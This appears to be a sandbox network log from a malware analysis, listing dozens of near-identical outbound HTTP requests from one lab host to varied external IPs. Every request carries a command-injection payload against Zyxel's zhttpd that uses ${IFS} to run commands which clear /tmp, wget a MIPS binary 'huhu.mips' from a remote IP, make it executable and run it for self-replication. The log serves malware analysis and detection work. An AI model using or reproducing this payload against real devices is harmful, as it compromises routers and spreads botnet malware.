                                                        Feb 2, 2024 06:21:10.948827028 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4667192.168.2.1459750188.172.45.75443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:10.948877096 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4668192.168.2.1453618189.251.168.31443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:10.948911905 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4669192.168.2.1448180144.103.65.77443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:10.948966026 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4670192.168.2.143412850.144.166.155443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:10.949012995 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4671192.168.2.145805649.215.20.195443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:10.949059010 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4672192.168.2.1433630168.26.40.182443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:10.949094057 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4673192.168.2.1450094118.169.72.189443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:10.949131012 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4674192.168.2.14512549.25.113.179443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:10.949191093 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4675192.168.2.1453606135.0.71.60443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:10.949230909 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4676192.168.2.145452243.160.39.51443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:10.949285984 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4677192.168.2.1439484140.124.235.38443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:10.949299097 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4678192.168.2.143775440.200.106.159443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:10.949338913 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4679192.168.2.1459424213.168.51.62443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:10.949399948 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4680192.168.2.14513305.178.254.25443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:10.949451923 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4681192.168.2.146022279.8.112.89443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:10.949476004 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4682192.168.2.145409296.176.48.80443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:10.949525118 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4683192.168.2.144046246.8.253.170443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:10.949578047 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4684192.168.2.1443164150.191.56.180443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:10.949609041 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4685192.168.2.145265244.48.122.226443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:10.949656963 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4686192.168.2.145422850.39.184.219443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:10.949717045 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4687192.168.2.144266862.98.236.81443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:10.949763060 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4688192.168.2.144536662.254.79.143443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:10.949814081 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4689192.168.2.1435240147.63.17.80443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:10.949825048 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4690192.168.2.1454836102.92.22.56443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:10.949855089 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4691192.168.2.143846239.65.223.153443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:10.949925900 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4692192.168.2.1460562119.205.97.98443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:10.949950933 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4693192.168.2.145206881.39.89.103443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:10.949985027 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4694192.168.2.1452598189.160.88.95443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:10.950045109 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4695192.168.2.1441144102.51.211.47443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:10.950077057 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4696192.168.2.1452204182.241.68.35443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:10.950136900 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4697192.168.2.145528686.161.130.10443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:10.950189114 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4698192.168.2.143509675.234.224.197443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:10.950218916 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4699192.168.2.1443758212.31.12.73443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:10.950295925 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4700192.168.2.1438796166.138.250.128443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:10.950321913 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4701192.168.2.1444734152.137.55.231443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:10.950357914 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4702192.168.2.1446854115.5.147.103443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:10.950397968 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4703192.168.2.1446402179.146.225.165443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:10.950432062 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4704192.168.2.145472076.65.47.33443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:10.950467110 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4705192.168.2.1448650213.33.185.84443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:10.950517893 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4706192.168.2.1443170149.60.48.145443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:10.950558901 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4707192.168.2.145354286.58.175.58443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:10.950618029 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4708192.168.2.1436190212.3.204.57443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:10.950644970 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4709192.168.2.1442800195.39.127.245443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:10.950659037 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4710192.168.2.144033469.201.223.11443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:10.950692892 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4711192.168.2.1434594151.198.145.191443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:10.950731039 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4712192.168.2.1450056192.103.75.216443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:10.950757980 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4713192.168.2.143511293.210.71.175443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:10.950809002 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4714192.168.2.1445506153.205.223.27443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:10.950850010 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4715192.168.2.144299676.195.47.109443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:10.950905085 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4716192.168.2.1445390208.61.194.42443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:10.950926065 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4717192.168.2.1439920191.22.29.219443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:10.950957060 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4718192.168.2.1450904125.204.220.12443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:10.951004982 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4719192.168.2.1451306116.138.118.101443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:10.951033115 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4720192.168.2.1453212179.42.242.43443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:10.951077938 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4721192.168.2.1442772112.75.39.139443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:10.951117039 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4722192.168.2.146087225.88.220.200443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:10.951170921 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4723192.168.2.1447138205.33.136.194443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:10.951229095 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4724192.168.2.145255414.150.166.164443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:10.951271057 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4725192.168.2.144323499.154.211.243443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:10.951301098 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4726192.168.2.1450798174.216.233.209443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:10.951351881 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4727192.168.2.144236062.154.199.180443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:10.951395988 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4728192.168.2.1457520176.228.129.161443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:10.951399088 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4729192.168.2.144031874.60.32.61443
                                                        TimestampBytes transferredDirectionData
